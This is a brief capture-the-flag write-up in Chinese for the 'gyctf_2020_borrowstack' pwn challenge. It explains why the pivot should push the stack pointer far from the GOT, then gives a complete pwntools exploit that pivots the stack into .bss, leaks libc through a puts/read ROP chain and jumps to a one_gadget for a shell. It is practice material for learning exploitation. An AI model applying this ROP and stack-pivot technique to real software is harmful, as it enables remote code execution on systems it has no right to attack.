注意上图，因为bss与got表位置比较近，所以要尽可能的抬高栈顶指针即rsp，不然在后续调用其他函数的时候，会因为一些push操作或者sub使得栈顶指针减小覆盖到got中的内容导致无法泄露libc或者使得程序无法正常运行…

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

proc_name = './gyctf_2020_borrowstack'
p = process(proc_name)
p = remote('node3.buuoj.cn', 26383)
elf = ELF(proc_name)
main_addr = elf.sym['main']
leave_ret = 0x400699
puts_plt = elf.plt['puts']
read_got = elf.got['read']
pop_rdi = 0x400703
payload = b'a' * (0x60) + p64(0x601080 - 0x8) +   p64(leave_ret)
p.sendafter('want', payload)
payload1 =  p64(0x4004c9) * ((0x100 - 0x20) // 8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
p.sendafter('now!', payload1)
p.recv()
read_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
log.info(hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
one_gadget = libc_base + 0x4526a
payload2 = b'a' * (0x60 + 8) + p64(one_gadget)
p.send(payload2)
p.interactive()